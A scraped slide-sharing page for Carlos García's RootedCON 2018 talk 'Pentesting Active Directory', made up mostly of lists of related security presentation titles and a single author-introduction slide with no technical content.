(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
 
Simplified Security Code Review Process
Simplified Security Code Review ProcessSimplified Security Code Review Process
Simplified Security Code Review Process
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 

Similar to Carlos García - Pentesting Active Directory [rooted2018]

BSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming Workshop
Ajay Choudhary
 
Demystifying SharePoint Infrastructure – for NON-IT People
Demystifying SharePoint Infrastructure – for NON-IT People Demystifying SharePoint Infrastructure – for NON-IT People
Demystifying SharePoint Infrastructure – for NON-IT People
SPC Adriatics
 
Null talk
Null talkNull talk
Null talk
Agam Jain
 
Module 4 Enumeration
Module 4 EnumerationModule 4 Enumeration
Module 4 Enumerationleminhvuong
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder
 
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defenseDEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
Felipe Prado
 
Penetration Testing Services Technical Description Cyber51
Penetration Testing Services Technical Description Cyber51Penetration Testing Services Technical Description Cyber51
Penetration Testing Services Technical Description Cyber51
martinvoelk
 
Making Threat Intelligence Actionable Final
Making Threat Intelligence Actionable FinalMaking Threat Intelligence Actionable Final
Making Threat Intelligence Actionable Final
Priyanka Aash
 
AAA Implementation
AAA ImplementationAAA Implementation
AAA Implementation
Ahmad El Tawil
 
Cisco Trustsec & Security Group Tagging
Cisco Trustsec & Security Group TaggingCisco Trustsec & Security Group Tagging
Cisco Trustsec & Security Group Tagging
Cisco Canada
 
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi SassiInSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
Yossi Sassi
 
DANE and Application Uses of DNSSEC
DANE and Application Uses of DNSSECDANE and Application Uses of DNSSEC
DANE and Application Uses of DNSSEC
Shumon Huque
 
Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018
Paula Januszkiewicz
 
New Approaches for Fraud Detection on Apache Kafka and KSQL
New Approaches for Fraud Detection on Apache Kafka and KSQLNew Approaches for Fraud Detection on Apache Kafka and KSQL
New Approaches for Fraud Detection on Apache Kafka and KSQL
confluent
 
IoT Secure Bootsrapping : ideas
IoT Secure Bootsrapping : ideasIoT Secure Bootsrapping : ideas
IoT Secure Bootsrapping : ideas
Jean-Baptiste Trystram
 
TechWiseTV Workshop: Cisco Stealthwatch and ISE
TechWiseTV Workshop: Cisco Stealthwatch and ISETechWiseTV Workshop: Cisco Stealthwatch and ISE
TechWiseTV Workshop: Cisco Stealthwatch and ISE
Robb Boyd
 
Keystone - Openstack Identity Service
Keystone - Openstack Identity Service Keystone - Openstack Identity Service
Keystone - Openstack Identity Service
Prasad Mukhedkar
 
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryDEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
Felipe Prado
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Xavier Ashe
 
Cloud Platform Symantec Meetup Nov 2014
Cloud Platform Symantec Meetup Nov 2014Cloud Platform Symantec Meetup Nov 2014
Cloud Platform Symantec Meetup Nov 2014
Miguel Zuniga
 

Similar to Carlos García - Pentesting Active Directory [rooted2018] (20)

BSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming Workshop
 
Demystifying SharePoint Infrastructure – for NON-IT People
Demystifying SharePoint Infrastructure – for NON-IT People Demystifying SharePoint Infrastructure – for NON-IT People
Demystifying SharePoint Infrastructure – for NON-IT People
 
Null talk
Null talkNull talk
Null talk
 
Module 4 Enumeration
Module 4 EnumerationModule 4 Enumeration
Module 4 Enumeration
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defenseDEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
 
Penetration Testing Services Technical Description Cyber51
Penetration Testing Services Technical Description Cyber51Penetration Testing Services Technical Description Cyber51
Penetration Testing Services Technical Description Cyber51
 
Making Threat Intelligence Actionable Final
Making Threat Intelligence Actionable FinalMaking Threat Intelligence Actionable Final
Making Threat Intelligence Actionable Final
 
AAA Implementation
AAA ImplementationAAA Implementation
AAA Implementation
 
Cisco Trustsec & Security Group Tagging
Cisco Trustsec & Security Group TaggingCisco Trustsec & Security Group Tagging
Cisco Trustsec & Security Group Tagging
 
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi SassiInSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
 
DANE and Application Uses of DNSSEC
DANE and Application Uses of DNSSECDANE and Application Uses of DNSSEC
DANE and Application Uses of DNSSEC
 
Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018
 
New Approaches for Fraud Detection on Apache Kafka and KSQL
New Approaches for Fraud Detection on Apache Kafka and KSQLNew Approaches for Fraud Detection on Apache Kafka and KSQL
New Approaches for Fraud Detection on Apache Kafka and KSQL
 
IoT Secure Bootsrapping : ideas
IoT Secure Bootsrapping : ideasIoT Secure Bootsrapping : ideas
IoT Secure Bootsrapping : ideas
 
TechWiseTV Workshop: Cisco Stealthwatch and ISE
TechWiseTV Workshop: Cisco Stealthwatch and ISETechWiseTV Workshop: Cisco Stealthwatch and ISE
TechWiseTV Workshop: Cisco Stealthwatch and ISE
 
Keystone - Openstack Identity Service
Keystone - Openstack Identity Service Keystone - Openstack Identity Service
Keystone - Openstack Identity Service
 
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryDEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016
 
Cloud Platform Symantec Meetup Nov 2014
Cloud Platform Symantec Meetup Nov 2014Cloud Platform Symantec Meetup Nov 2014
Cloud Platform Symantec Meetup Nov 2014
 

More from RootedCON

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
RootedCON
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
RootedCON
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
RootedCON
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
RootedCON
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
RootedCON
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
RootedCON
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
RootedCON
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
RootedCON
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
RootedCON
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
RootedCON
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
RootedCON
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
RootedCON
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
RootedCON
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopez
RootedCON
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
RootedCON
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jara
RootedCON
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
RootedCON
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
RootedCON
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
RootedCON
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
RootedCON
 

More from RootedCON (20)

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopez
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jara
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
 

Recently uploaded

Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Nexer Digital
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
Neo4j
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems S.M.S.A.
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
Adtran
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
Quotidiano Piemontese
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
Neo4j
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
Laura Byrne
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
DianaGray10
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
Alpen-Adria-Universität
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
Ralf Eggert
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
Matthew Sinclair
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 

Recently uploaded (20)

Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 

Carlos García - Pentesting Active Directory [rooted2018]

  • 2. ciyinet WHOAMI Carlos García García - Computer Science Engineer - Penetration Testing and Red Teaming - OSCP Certified - Co-author book “Hacking Windows: Ataques a sistemas y redes Microsoft” 2Pentesting Active Directory
